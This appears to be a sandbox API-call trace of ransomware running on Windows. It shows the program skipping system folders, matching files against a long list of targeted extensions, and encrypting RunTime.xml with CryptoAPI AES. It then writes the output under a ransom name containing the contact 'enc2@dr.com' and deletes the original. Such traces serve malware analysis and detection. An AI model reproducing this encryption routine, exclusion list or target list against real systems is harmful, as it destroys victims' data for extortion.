	[0173.864] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\"
	[0173.864] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\"
	[0173.864] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*.*"
	[0173.864] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0173.887] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*.*") returned 89
	[0173.887] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.887] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*") returned 0x59
	[0173.887] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.887] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0173.887] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.888] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0173.888] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.889] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0173.889] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.889] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.889] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.889] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0173.889] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.889] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0173.890] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.890] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.890] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.890] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0173.890] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.890] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0173.890] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.891] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0173.891] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.891] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0173.891] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.891] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0173.891] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.891] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.891] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.892] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0173.892] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.892] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0173.892] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.892] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0173.892] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.892] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0173.893] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.893] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0173.893] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.893] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0173.893] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="..", cAlternateFileName="")) returned 1
	[0173.893] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0173.893] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a002fa, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a002fa, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="RunTime.xml", cAlternateFileName="")) returned 1
	[0173.894] lstrcmpW (lpString1="RunTime.xml", lpString2="..") returned 1
	[0173.894] lstrcmpW (lpString1="RunTime.xml", lpString2=".") returned 1
	[0173.894] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\"
	[0173.894] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\", lpString2="RunTime.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml"
	[0173.894] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml") returned 97
	[0173.894] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.894] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml") returned 0x61
	[0173.894] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.894] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.895] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml"
	[0173.895] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml") returned 97
	[0173.895] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.895] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.895] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0173.895] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.895] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0173.896] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.896] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.896] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.897] ReadFile (in: hFile=0x39c, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x15c, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x189930*=0x15c, lpOverlapped=0x0) returned 1
	[0173.900] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.900] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcaf78) returned 1
	[0173.903] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.903] CryptCreateHash (in: hProv=0xfcaf78, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0173.903] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.903] CryptHashData (hHash=0xfb8f30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0173.904] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.904] CryptDeriveKey (in: hProv=0xfcaf78, Algid=0x6610, hBaseData=0xfb8f30, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb92f0) returned 1
	[0173.904] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.904] CryptEncrypt (in: hKey=0xfb92f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x15c, dwBufLen=0x15c | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x160) returned 1
	[0173.904] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.905] RtlMoveMemory (in: Destination=0xfdc770, Source=0xfdcd58, Length=0x15c | out: Destination=0xfdc770) 
	[0173.905] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.905] CryptEncrypt (in: hKey=0xfb92f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x15c, dwBufLen=0x160 | out: pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x160) returned 1
	[0173.905] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.906] CryptDestroyKey (hKey=0xfb92f0) returned 1
	[0173.906] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.906] CryptDestroyHash (hHash=0xfb8f30) returned 1
	[0173.906] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.906] CryptReleaseContext (hProv=0xfcaf78, dwFlags=0x0) returned 1
	[0173.906] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.906] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.907] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.907] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0173.908] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 139
	[0173.908] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0173.911] WriteFile (in: hFile=0x3a0, lpBuffer=0xfdc770*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfdc770*, lpNumberOfBytesWritten=0x189938*=0x160, lpOverlapped=0x0) returned 1
	[0173.913] CloseHandle (hObject=0x3a0) returned 1
	[0173.914] CloseHandle (hObject=0x39c) returned 1
	[0173.914] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml")) returned 1
	[0173.917] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml")) returned 0
	[0173.918] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a002fa, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a002fa, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="RunTime.xml", cAlternateFileName="")) returned 0
	[0173.918] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0173.918] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0173.918] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov"
